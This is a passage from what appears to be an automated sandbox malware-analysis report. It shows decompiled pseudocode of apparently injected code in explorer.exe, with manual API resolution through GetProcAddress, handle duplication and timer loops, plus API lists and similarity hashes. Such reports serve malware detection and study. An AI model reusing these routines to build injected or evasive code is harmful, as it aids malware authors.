        						if((_v5 & 0x000000ff) != 3) {
        							if((_v5 & 0x000000ff) == 0xa) {
        								 *_v40 =  *_v40 + _v56;
        							}
        						} else {
        							 *_v40 =  *_v40 + _v56;
        						}
        						_v32 =  &(_v32[1]);
        					}
        					_v44 = _v32;
        				}
        				goto L13;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
        • LoadLibraryA.KERNEL32(?), ref: 00092C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
        • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
        • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
        • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				void* _t13;
        				intOrPtr _t15;
        				signed int _t16;
        				intOrPtr _t17;
        				signed int _t18;
        				char _t20;
        				intOrPtr _t22;
        				void* _t23;
        				void* _t24;
        				intOrPtr _t29;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t48;
        				void* _t51;
        				signed int _t61;
        				signed int _t64;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t61 = __ecx;
        				_t41 =  *0x9e6dc; // 0x1e4
        				_t13 = E0008A4BF(_t41, 0);
        				while(_t13 < 0) {
        					E0008980C( &_v28);
        					_t43 =  *0x9e6e0; // 0x0
        					_t15 =  *0x9e6e4; // 0x0
        					_t41 = _t43 + 0xe10;
        					asm("adc eax, ebx");
        					__eflags = _t15 - _v24;
        					if(__eflags > 0) {
        						L9:
        						_t16 = 0xfffffffe;
        						L13:
        						return _t16;
        					}
        					if(__eflags < 0) {
        						L4:
        						_t17 =  *0x9e684; // 0x133f8f0
        						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
        						__eflags = _t18;
        						if(_t18 == 0) {
        							break;
        						}
        						_t35 =  *0x9e684; // 0x133f8f0
        						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
        						_t41 =  *0x9e6dc; // 0x1e4
        						__eflags = 0;
        						_t13 = E0008A4BF(_t41, 0);
        						continue;
        					}
        					__eflags = _t41 - _v28;
        					if(_t41 >= _v28) {
        						goto L9;
        					}
        					goto L4;
        				}
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t20 =  *0x9e6e8; // 0x133fdb8
        				_v28 = _t20;
        				_t22 = E0008A6A9(_t41, _t61,  &_v16);
        				_v20 = _t22;
        				if(_t22 != 0) {
        					_t23 = GetCurrentProcess();
        					_t24 = GetCurrentThread();
        					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
        					E0008980C(0x9e6e0);
        					_t64 = E00081A1B( &_v28, E00081226, _t71);
        					__eflags = _t64;
        					if(_t64 >= 0) {
        						_push(0);
        						_push( *0x9e760);
        						_t51 = 0x27;
        						E00089F06(_t51);
        					}
        				} else {
        					_t64 = _t61 | 0xffffffff;
        				}
        				_t29 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
        				_t48 =  *0x9e6dc; // 0x1e4
        				 *0x9e6d0 = 0;
        				E0008A4DB(_t48);
        				E0008861A( &_v24, 0);
        				_t16 = _t64;
        				goto L13;
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
        • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
        • Opcode Fuzzy Hash: 7af54bf47eeafca49fec7a466d95b770275a6c99f1a555b29a304e1941eb5a54
        • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E00081B2D(void* __eflags, void* __fp0) {
        				char _v24;
        				char _v28;
        				void* _t12;
        				intOrPtr _t14;
        				void* _t15;
        				intOrPtr _t16;
        				void* _t17;
        				void* _t19;
        				void* _t20;
        				char _t24;
        				intOrPtr _t26;
        				intOrPtr _t28;
        				intOrPtr _t33;
        				intOrPtr _t38;
        				intOrPtr _t40;
        				void* _t41;
        				intOrPtr _t46;
        				void* _t48;
        				intOrPtr _t51;
        				void* _t61;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t38 =  *0x9e6f4; // 0x1e0
        				_t12 = E0008A4BF(_t38, 0);
        				while(_t12 < 0) {
        					E0008980C( &_v28);
        					_t40 =  *0x9e700; // 0x0
        					_t14 =  *0x9e704; // 0x0
        					_t41 = _t40 + 0x3840;
        					asm("adc eax, ebx");
        					__eflags = _t14 - _v24;
        					if(__eflags > 0) {
        						L13:
        						_t15 = 0;
        					} else {
        						if(__eflags < 0) {
        							L4:
        							_t16 =  *0x9e684; // 0x133f8f0
        							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
        							__eflags = _t17;
        							if(_t17 == 0) {
        								break;
        							} else {
        								_t33 =  *0x9e684; // 0x133f8f0
        								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
        								_t51 =  *0x9e6f4; // 0x1e0
        								__eflags = 0;
        								_t12 = E0008A4BF(_t51, 0);
        								continue;
        							}
        						} else {
        							__eflags = _t41 - _v28;
        							if(_t41 >= _v28) {
        								goto L13;
        							} else {
        								goto L4;
        							}
        						}
        					}
        					L12:
        					return _t15;
        				}
        				E0008980C(0x9e700);
        				_t19 = GetCurrentProcess();
        				_t20 = GetCurrentThread();
        				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 =  *0x9e6e8; // 0x133fdb8
        				_v28 = _t24;
        				_t61 = E00081A1B( &_v28, E0008131E, _t71);
        				if(_t61 >= 0) {
        					_push(0);
        					_push( *0x9e760);
        					_t48 = 0x27;
        					E00089F06(_t48);
        				}
        				if(_v24 != 0) {
        					E00086890( &_v24);
        				}
        				_t26 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
        				_t28 =  *0x9e758; // 0x0
        				 *0x9e6ec = 0;
        				_t29 =  !=  ? 1 : _t28;
        				_t46 =  *0x9e6f4; // 0x1e0
        				 *0x9e758 =  !=  ? 1 : _t28;
        				E0008A4DB(_t46);
        				_t15 = _t61;
        				goto L12;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
        • DuplicateHandle.KERNEL32 ref: 00081BD9
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
        • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
        • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
        • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
        Uniqueness

        Uniqueness Score: -1.00%